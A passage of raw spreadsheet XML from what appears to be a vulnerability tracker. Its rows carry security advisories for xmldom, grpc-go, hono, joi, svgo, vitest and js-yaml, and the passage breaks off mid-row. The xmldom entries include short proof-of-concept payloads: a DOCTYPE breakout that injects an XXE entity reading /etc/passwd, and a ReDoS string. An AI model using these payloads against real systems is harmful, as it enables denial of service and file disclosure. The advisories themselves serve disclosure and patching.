affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T1628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="1629"><c r="A1629" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1629" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D1629" s="5" t="inlineStr" /><c r="E1629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1629" s="5" t="inlineStr" /><c r="H1629" s="5" t="n"><v>0.003</v></c><c r="I1629" s="5" t="inlineStr" /><c r="J1629" s="5" t="inlineStr" /><c r="K1629" s="5" t="inlineStr" /><c r="L1629" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1629" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1629" s="5" t="inlineStr" /><c r="R1629" s="5" t="inlineStr" /><c r="S1629" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.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1629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="1630"><c r="A1630" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1630" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D1630" s="5" t="inlineStr" /><c r="E1630" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1630" s="5" t="inlineStr" /><c r="H1630" s="5" t="n"><v>0.003</v></c><c r="I1630" s="5" t="inlineStr" /><c r="J1630" s="5" t="inlineStr" /><c r="K1630" s="5" t="inlineStr" /><c r="L1630" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1630" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1630" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1630" s="5" t="inlineStr" /><c r="R1630" s="5" t="inlineStr" /><c r="S1630" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T1630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="1631"><c r="A1631" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1631" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D1631" s="5" t="inlineStr" /><c r="E1631" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1631" s="5" t="inlineStr" /><c r="H1631" s="5" t="n"><v>0.003</v></c><c r="I1631" s="5" t="inlineStr" /><c r="J1631" s="5" t="inlineStr" /><c r="K1631" s="5" t="inlineStr" /><c r="L1631" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1631" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1631" s="5" t="inlineStr" /><c r="R1631" s="5" t="inlineStr" /><c r="S1631" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T1631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="1632"><c r="A1632" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1632" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D1632" s="5" t="inlineStr" /><c r="E1632" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1632" s="5" t="inlineStr" /><c r="H1632" s="5" t="n"><v>0.004</v></c><c r="I1632" s="5" t="inlineStr" /><c r="J1632" s="5" t="inlineStr" /><c r="K1632" s="5" t="inlineStr" /><c r="L1632" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1632" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1632" s="5" t="inlineStr" /><c r="R1632" s="5" t="inlineStr" /><c r="S1632" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T1632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="1633"><c r="A1633" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1633" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D1633" s="5" t="inlineStr" /><c r="E1633" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1633" s="5" t="inlineStr" /><c r="H1633" s="5" t="n"><v>0.003</v></c><c r="I1633" s="5" t="inlineStr" /><c r="J1633" s="5" t="inlineStr" /><c r="K1633" s="5" t="inlineStr" /><c r="L1633" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1633" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1633" s="5" t="inlineStr" /><c r="R1633" s="5" t="inlineStr" /><c r="S1633" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T1633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="1634"><c r="A1634" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1634" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D1634" s="5" t="inlineStr" /><c r="E1634" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1634" s="5" t="inlineStr" /><c r="H1634" s="5" t="n"><v>0.003</v></c><c r="I1634" s="5" t="inlineStr" /><c r="J1634" s="5" t="inlineStr" /><c r="K1634" s="5" t="inlineStr" /><c r="L1634" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M1634" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1634" s="5" t="inlineStr" /><c r="R1634" s="5" t="inlineStr" /><c r="S1634" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T1634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="1635"><c r="A1635" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1635" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D1635" s="5" t="inlineStr" /><c r="E1635" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1635" s="5" t="inlineStr" /><c r="H1635" s="5" t="n"><v>0.003</v></c><c r="I1635" s="5" t="inlineStr" /><c r="J1635" s="5" t="inlineStr" /><c r="K1635" s="5" t="inlineStr" /><c r="L1635" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M1635" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1635" s="5" t="inlineStr" /><c r="R1635" s="5" t="inlineStr" /><c r="S1635" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T1635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="1636"><c r="A1636" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1636" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D1636" s="5" t="inlineStr" /><c r="E1636" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1636" s="5" t="inlineStr" /><c r="H1636" s="5" t="n"><v>0.003</v></c><c r="I1636" s="5" t="inlineStr" /><c r="J1636" s="5" t="inlineStr" /><c r="K1636" s="5" t="inlineStr" /><c r="L1636" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1636" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1636" s="5" t="inlineStr" /><c r="R1636" s="5" t="inlineStr" /><c r="S1636" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T1636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="1637"><c r="A1637" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1637" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D1637" s="5" t="inlineStr" /><c r="E1637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1637" s="5" t="inlineStr" /><c r="H1637" s="5" t="n"><v>0.003</v></c><c r="I1637" s="5" t="inlineStr" /><c r="J1637" s="5" t="inlineStr" /><c r="K1637" s="5" t="inlineStr" /><c r="L1637" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1637" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1637" s="5" t="inlineStr" /><c r="R1637" s="5" t="inlineStr" /><c r="S1637" s="5" t="inlineStr"><is><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is></c><c r="T1637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="1638"><c r="A1638" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1638" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D1638" s="5" t="inlineStr" /><c r="E1638" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1638" s="5" t="inlineStr" /><c r="H1638" s="5" t="n"><v>0.004</v></c><c r="I1638" s="5" t="inlineStr" /><c r="J1638" s="5" t="inlineStr" /><c r="K1638" s="5" t="inlineStr" /><c r="L1638" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M1638" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1638" s="5" t="inlineStr" /><c r="R1638" s="5" t="inlineStr" /><c r="S1638" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T1638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="1639"><c r="A1639" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1639" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D1639" s="5" t="inlineStr" /><c r="E1639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1639" s="5" t="inlineStr" /><c r="H1639" s="5" t="n"><v>0.004</v></c><c r="I1639" s="5" t="inlineStr" /><c r="J1639" s="5" t="inlineStr" /><c r="K1639" s="5" t="inlineStr" /><c r="L1639" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M1639" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1639" s="5" t="inlineStr" /><c r="R1639" s="5" t="inlineStr" /><c r="S1639" s="5" 